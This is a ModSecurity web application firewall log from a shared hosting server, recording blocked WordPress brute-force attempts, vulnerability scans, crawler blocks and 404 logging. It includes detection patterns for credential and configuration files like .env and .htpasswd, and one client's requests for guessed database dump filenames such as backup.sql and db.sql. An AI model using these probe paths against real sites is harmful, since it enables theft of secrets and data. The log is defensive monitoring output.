[Tue May 26 16:13:43.245247 2026] [security2:error] [pid 782634:tid 782799] [client 54.205.63.235:55121] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/demo/wp-admin/install.php"] [unique_id "ahV5X__P9qBfeb1w76Y98gAAACM"]
[Tue May 26 16:13:43.245574 2026] [security2:error] [pid 782634:tid 782825] [client 54.205.63.235:55114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-admin/install.php"] [unique_id "ahV5X__P9qBfeb1w76Y96wAAAD0"]
[Tue May 26 16:13:43.308325 2026] [security2:error] [pid 782634:tid 782860] [client 54.205.63.235:55140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/test/wp-admin/install.php"] [unique_id "ahV5X__P9qBfeb1w76Y99gAAAGA"]
[Tue May 26 16:13:43.675877 2026] [security2:error] [pid 782634:tid 782814] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5X__P9qBfeb1w76Y99QAAADI"]
[Tue May 26 16:13:45.694071 2026] [security2:error] [pid 782634:tid 782786] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5Yf_P9qBfeb1w76Y-FAAAABY"]
[Tue May 26 16:13:45.803765 2026] [security2:error] [pid 782634:tid 782645] [remote 45.79.189.31:42426] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.189.79.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahV5Yf_P9qBfeb1w76Y-HgAANAo"]
[Tue May 26 16:13:46.996074 2026] [security2:error] [pid 782634:tid 782833] [client 103.44.52.196:59874] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5Yv_P9qBfeb1w76Y-OQAAAEU"]
[Tue May 26 16:13:46.996188 2026] [security2:error] [pid 782634:tid 782833] [client 103.44.52.196:59874] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5Yv_P9qBfeb1w76Y-OQAAAEU"]
[Tue May 26 16:13:47.297055 2026] [security2:error] [pid 782634:tid 782774] [client 62.60.130.233:62798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "blog.jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahV5Y__P9qBfeb1w76Y-OwAAAAo"], referer: https://www.facebook.com/
[Tue May 26 16:13:47.487109 2026] [security2:error] [pid 782634:tid 782889] [client 106.219.85.83:31244] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5Y__P9qBfeb1w76Y-RAAAAH0"]
[Tue May 26 16:13:47.487292 2026] [security2:error] [pid 782634:tid 782889] [client 106.219.85.83:31244] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5Y__P9qBfeb1w76Y-RAAAAH0"]
[Tue May 26 16:13:47.918080 2026] [security2:error] [pid 782634:tid 782770] [client 62.60.130.233:52248] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "blog.jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahV5Y__P9qBfeb1w76Y-UQAAAAY"]
[Tue May 26 16:13:48.461127 2026] [security2:error] [pid 782634:tid 782788] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5ZP_P9qBfeb1w76Y-WAAAABg"]
[Tue May 26 16:13:49.990567 2026] [security2:error] [pid 782634:tid 782841] [client 62.60.130.233:62110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "blog.jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahV5Zf_P9qBfeb1w76Y-gQAAAE0"]
[Tue May 26 16:13:50.296589 2026] [security2:error] [pid 782634:tid 782889] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5Zf_P9qBfeb1w76Y-gAAAAH0"]
[Tue May 26 16:13:50.623426 2026] [security2:error] [pid 782634:tid 782887] [client 103.46.10.14:55756] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "xllent.in"] [uri "/index.php"] [unique_id "ahV5Zv_P9qBfeb1w76Y-kwAAAHs"]
[Tue May 26 16:13:52.274556 2026] [security2:error] [pid 782634:tid 782832] [client 77.68.83.86:64363] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.83.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jobs.ucdc.co.in"] [uri "/images/images/cache.php"] [unique_id "ahV5aP_P9qBfeb1w76Y-rwAAAEQ"], referer: www.google.com
[Tue May 26 16:13:52.470879 2026] [security2:error] [pid 782634:tid 782805] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5aP_P9qBfeb1w76Y-pwAAACk"]
[Tue May 26 16:13:54.231823 2026] [security2:error] [pid 782634:tid 782782] [client 77.68.83.86:57072] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.83.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jobs.ucdc.co.in"] [uri "/images/images/cache.php"] [unique_id "ahV5av_P9qBfeb1w76Y-3QAAABI"], referer: www.google.com
[Tue May 26 16:13:54.584702 2026] [security2:error] [pid 782634:tid 782824] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5av_P9qBfeb1w76Y-2QAAADw"]
[Tue May 26 16:13:54.597073 2026] [security2:error] [pid 782634:tid 782816] [client 176.65.139.237:26266] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "shirdisaibabatemple.org.svijaykumar.in"] [uri "/.env"] [unique_id "ahV5av_P9qBfeb1w76Y-4QAAADQ"]
[Tue May 26 16:13:56.002980 2026] [security2:error] [pid 782634:tid 782814] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5a__P9qBfeb1w76Y_CAAAADI"]
[Tue May 26 16:13:58.230657 2026] [security2:error] [pid 782634:tid 782846] [client 106.219.85.83:31763] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5bv_P9qBfeb1w76Y_jAAAAFI"]
[Tue May 26 16:13:58.230825 2026] [security2:error] [pid 782634:tid 782846] [client 106.219.85.83:31763] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5bv_P9qBfeb1w76Y_jAAAAFI"]
[Tue May 26 16:13:58.501005 2026] [security2:error] [pid 782634:tid 782789] [client 103.44.52.196:42236] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5bv_P9qBfeb1w76Y_kwAAABk"]
[Tue May 26 16:13:58.501153 2026] [security2:error] [pid 782634:tid 782789] [client 103.44.52.196:42236] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5bv_P9qBfeb1w76Y_kwAAABk"]
[Tue May 26 16:13:58.573562 2026] [security2:error] [pid 782634:tid 782770] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5bv_P9qBfeb1w76Y_jwAAAAY"]
[Tue May 26 16:13:59.845958 2026] [security2:error] [pid 782634:tid 782883] [client 114.119.128.127:20679] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/beta/index.php"] [unique_id "ahV5b__P9qBfeb1w76Y_3wAAAHc"], referer: http://glorodavionics.com/beta/index.php?route=product/product&manufacturer_id=11&product_id=107
[Tue May 26 16:14:00.095738 2026] [security2:error] [pid 782634:tid 782796] [client 89.221.206.243:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV5cP_P9qBfeb1w76Y_8gAAACA"], referer: https://www.anujtradingco.com/
[Tue May 26 16:14:00.153146 2026] [security2:error] [pid 782634:tid 782838] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5b__P9qBfeb1w76Y_2wAAAEo"]
[Tue May 26 16:14:01.238712 2026] [security2:error] [pid 782634:tid 782878] [client 89.221.206.243:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV5cf_P9qBfeb1w76ZAGwAAAHI"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1135507&moderation-hash=a60093699166c1bb92a1b77248c9412a
[Tue May 26 16:14:02.833399 2026] [security2:error] [pid 782634:tid 782839] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5cv_P9qBfeb1w76ZAUAAAAEs"]
[Tue May 26 16:14:05.229287 2026] [security2:error] [pid 782634:tid 782769] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5dP_P9qBfeb1w76ZAigAAAAU"]
[Tue May 26 16:14:06.919792 2026] [security2:error] [pid 782634:tid 782882] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5dv_P9qBfeb1w76ZAtQAAAHY"]
[Tue May 26 16:14:08.640212 2026] [security2:error] [pid 782634:tid 782780] [client 106.219.85.83:22883] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5eP_P9qBfeb1w76ZA5wAAABA"]
[Tue May 26 16:14:08.640435 2026] [security2:error] [pid 782634:tid 782780] [client 106.219.85.83:22883] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5eP_P9qBfeb1w76ZA5wAAABA"]
[Tue May 26 16:14:08.841685 2026] [security2:error] [pid 782634:tid 782865] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5eP_P9qBfeb1w76ZA4gAAAGU"]
[Tue May 26 16:14:08.879129 2026] [security2:error] [pid 782634:tid 782810] [client 103.44.52.196:60650] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5eP_P9qBfeb1w76ZA9wAAAC4"]
[Tue May 26 16:14:08.879258 2026] [security2:error] [pid 782634:tid 782810] [client 103.44.52.196:60650] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5eP_P9qBfeb1w76ZA9wAAAC4"]
[Tue May 26 16:14:09.171481 2026] [security2:error] [pid 782634:tid 782639] [remote 121.200.216.55:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahV5eP_P9qBfeb1w76ZA-AAAUgQ"]
[Tue May 26 16:14:09.838123 2026] [security2:error] [pid 782634:tid 782840] [client 13.220.243.41:52995] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/1.sql"] [unique_id "ahV5ef_P9qBfeb1w76ZBDQAAAEw"]
[Tue May 26 16:14:10.428482 2026] [security2:error] [pid 782634:tid 782881] [client 13.220.243.41:53141] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/backup.sql"] [unique_id "ahV5ev_P9qBfeb1w76ZBGQAAAHU"]
[Tue May 26 16:14:10.896858 2026] [security2:error] [pid 782634:tid 782820] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5ev_P9qBfeb1w76ZBHAAAADg"]
[Tue May 26 16:14:11.108540 2026] [security2:error] [pid 782634:tid 782810] [client 13.220.243.41:53454] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/database.sql"] [unique_id "ahV5e__P9qBfeb1w76ZBKQAAAC4"]
[Tue May 26 16:14:11.598255 2026] [security2:error] [pid 782634:tid 782816] [client 13.220.243.41:53626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/data.sql"] [unique_id "ahV5e__P9qBfeb1w76ZBOgAAADQ"]
[Tue May 26 16:14:12.269514 2026] [security2:error] [pid 782634:tid 782840] [client 13.220.243.41:53908] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/db_backup.sql"] [unique_id "ahV5fP_P9qBfeb1w76ZBUAAAAEw"]
[Tue May 26 16:14:12.492776 2026] [security2:error] [pid 782634:tid 782803] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5fP_P9qBfeb1w76ZBTQAAACc"]
[Tue May 26 16:14:12.688268 2026] [security2:error] [pid 782634:tid 782817] [client 13.220.243.41:54055] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/dbdump.sql"] [unique_id "ahV5fP_P9qBfeb1w76ZBWgAAADU"]
[Tue May 26 16:14:13.105672 2026] [security2:error] [pid 782634:tid 782798] [client 13.220.243.41:54222] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/db.sql"] [unique_id "ahV5ff_P9qBfeb1w76ZBZQAAACI"]
[Tue May 26 16:14:13.609588 2026] [security2:error] [pid 782634:tid 782649] [remote 173.249.21.166:50774] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 166.21.249.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahV5ff_P9qBfeb1w76ZBbAAAew4"]
[Tue May 26 16:14:13.995636 2026] [security2:error] [pid 782634:tid 782821] [client 13.220.243.41:54544] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/dump.sql"] [unique_id "ahV5ff_P9qBfeb1w76ZBeQAAADk"]
[Tue May 26 16:14:14.537285 2026] [security2:error] [pid 782634:tid 782769] [client 13.220.243.41:54730] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/wrapmachines.sql"] [unique_id "ahV5fv_P9qBfeb1w76ZBiwAAAAU"]
[Tue May 26 16:14:14.976424 2026] [security2:error] [pid 782634:tid 782824] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5fv_P9qBfeb1w76ZBjAAAADw"]
[Tue May 26 16:14:15.290893 2026] [security2:error] [pid 782634:tid 782806] [client 13.220.243.41:55026] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/wrapmachines_db.sql"] [unique_id "ahV5f__P9qBfeb1w76ZBogAAACo"]
[Tue May 26 16:14:15.974693 2026] [security2:error] [pid 782634:tid 782804] [client 13.220.243.41:55230] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/localhost.sql"] [unique_id "ahV5f__P9qBfeb1w76ZBsAAAACg"]
[Tue May 26 16:14:16.423251 2026] [security2:error] [pid 782634:tid 782860] [client 13.220.243.41:55427] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/mysqldump.sql"] [unique_id "ahV5gP_P9qBfeb1w76ZBwAAAAGA"]
[Tue May 26 16:14:16.801333 2026] [security2:error] [pid 782634:tid 782800] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5gP_P9qBfeb1w76ZBvwAAACQ"]
[Tue May 26 16:14:16.970257 2026] [security2:error] [pid 782634:tid 782794] [client 13.220.243.41:55612] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/mysql.sql"] [unique_id "ahV5gP_P9qBfeb1w76ZBzQAAAB4"]
[Tue May 26 16:14:17.288455 2026] [security2:error] [pid 782634:tid 782799] [client 13.220.243.41:55701] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.wrapmachines.com"] [uri "/site.sql"] [unique_id "ahV5gf_P9qBfeb1w76ZB1wAAACM"]
